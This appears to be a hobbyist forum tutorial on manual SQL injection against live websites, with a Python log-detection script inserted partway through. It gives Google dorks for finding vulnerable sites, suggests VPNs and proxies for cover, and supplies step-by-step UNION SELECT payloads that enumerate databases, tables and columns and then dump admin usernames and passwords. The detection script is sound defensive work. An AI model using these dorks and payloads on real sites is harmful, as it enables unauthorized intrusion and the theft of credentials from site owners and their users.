SQL (Structured Query Language) Injection Tutorial:

Tools Needed:
SQLi scanner = just google it..
Hack Bar = just download this from the Mozilla Firefox add-ons,
Dorks = these are used to search for sites that can be injected. :D
Fingers = for typing
VPN (virtual private network) and Proxies = I won't explain these anymore, :3 just google them
BRAIN
Optional Tools
Havij and other automatic tools = this kind of tool is an automatic SQL injection tool, no more typing, just clicks..
Note: if you want to get good at SQL Injection, start with manual first, coz that's the key for you to become a good injector :))
Steps:
Some of the google Dorks:
There are many Google dorks, hundreds of them, and you can find them on Google, just search.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Ok, let's start. Search this on Google: inurl:index.php?id=
Note: if you want a site from a specific country or place, just add " Site:TW " :)
ex. inurl:index.php?id= Site:TW
TW stands for Taiwan, because they say Taiwan is OP. :3
1st. Finding vulnerable sites, 2nd. Finding amount of columns, 3rd. Getting MySQL version, 4th. Getting databases, 5th. Getting tables, 6th. Getting columns, 7th. Getting usernames and passwords
1. Finding vulnerable sites
Ex. here's my vulnerable site....http://www.SAMPLESITE.com.tw/index.php?id=32
To find out if the site is vulnerable, type ( ' ) at the end of the URL
ex. http://www.SAMPLESITE.com.tw/index.php?id=32'
If it throws an error, like
error in sql syntax .............................................................. near line 1
2. Finding Amount of Columns
To find out how many columns there are, you use the "order by #--" query. Ok, let's try:
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 1-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 2-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 3-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 4-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 5-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 6-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 7-- ==>> error now
So that means there are only 6 columns, because the error shows up at 7.. :D
Now let's find the vulnerable column. To do this please follow me:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,4,5,6--
After id= please insert [-] so the original query returns nothing (null) and the union values show up.
Now you'll see numbers on the website; let's say the number I saw is 4, so I'll inject into column 4.
3. Getting Mysql Version
Now we want to know the MySQL version. If it's over 5 then it's injectable by this tut. (If it's under 4 then you have to guess tables and columns.)
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,@@version,5,6--
In the vulnerable column we use @@version or version() instead of the column number. Ok, we found it.
4. Getting Databases
Now we want to find the databases and the current database. Here's the syntax for all databases: EX.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(schema_name),5,6 from information_schema.schemata--
Now we would like to know what the current database is; it's pretty obvious in this case but useful sometimes.
Syntax for current database:
www.SAMPLESITE/index_en.php?id=-7 union all select 1,2,3,database(),5,6 from information_schema.schemata--
Okay, found it..
5. Getting Tables
Now we want to get the tables through column #4, follow me
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
So you'll see the tables; look for the admin table. The admin table can have many names: admin, administrator, users, etc. I can't explain it much, just think about it... use your brain.. ex. the table here for me is users
6. Getting Columns,
Now we'll look for the columns, so we'll use the following code:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
Okay, observe the column carefully.. see that (column_name), information_schema.columns and table_name were swapped in, and database() was removed and replaced with the MySQL CHAR of users, because users is the table we'll dump. Follow: to get the SQL CHAR of "users", at the top left of Hackbar there's SQL, before XSS, click it, then MySQL, then MySQL CHAR, then type the string "users" and it will output CHAR(117, 115, 101, 114, 115).. okay? Got it?
7. Dumping users/pass (getting data)
Follow these steps.
Now you would like to dump logins and passwords.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(login,0x3a,pass),5,6 from users--
So there it is. You got the username and pass
ex.
admin:12345!@#$%
Let's Celebrate.. :D
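As an added defensive example (not part of the original tutorial), this Python script scores web-server access-log lines for the probing sequence walked through in steps 1 to 7: the quote test, the ORDER BY column count, and UNION SELECT queries against information_schema. The log lines, paths and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote_plus
# Constructed access-log sample (not from the original post) mirroring the
# sequence above: quote test, ORDER BY enumeration, then UNION SELECT probes.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=32' HTTP/1.1" 500 310
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=32%20order%20by%206-- HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=32%20order%20by%207-- HTTP/1.1" 500 310
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=-32%20union%20all%20select%201,2,3,@@version,5,6-- HTTP/1.1" 200 5200
203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?id=-32%20union%20all%20select%201,2,3,group_concat(table_name),5,6%20from%20information_schema.tables-- HTTP/1.1" 200 6000
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=17 HTTP/1.1" 200 4800
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One indicator per stage of the walkthrough; matched against the URL-decoded path.
INDICATORS = [
    ("quote_probe", re.compile(r"=\d+'\s*$")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_fn", re.compile(r"@@version|\bversion\(\)", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\(", re.I)),
]

def classify_request(path):
    """Return the names of the indicators present in one request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def analyze_log(text):
    """Aggregate per client IP: matching requests, distinct stages seen, 5xx responses."""
    report = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify_request(m["path"])
        if not found:
            continue
        entry = report.setdefault(m["ip"], {"hits": 0, "stages": set(), "errors": 0})
        entry["hits"] += 1
        entry["stages"].update(found)
        # A 5xx right after a probe suggests a verbose SQL error reached the client.
        entry["errors"] += int(m["status"].startswith("5"))
    return report

def suspicious_clients(report, min_stages=2):
    """Flag clients that progressed through at least min_stages distinct stages."""
    return sorted(ip for ip, e in report.items() if len(e["stages"]) >= min_stages)
```

Requiring two or more distinct stages from one client keeps a single stray apostrophe in a URL from raising an alert, while the full enumeration sequence is flagged even when every response was a 200.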
Note: there are many more methods, techniques and bypasses for SQLi.
examples are:
Bypassing
String based SQLi
error based
SQLi sql injection (double query error based)
ASP :D lol
SQli double query
and blind SQLi, which I haven't quite mastered yet. :D
There are also many ways to exploit and bypass a website, since almost all of them have vulnerabilities like
Upload vulnerabilities
XSS
CSRF
IIS exploits etc... blah blah, stay tuned for the next TUTS.... :)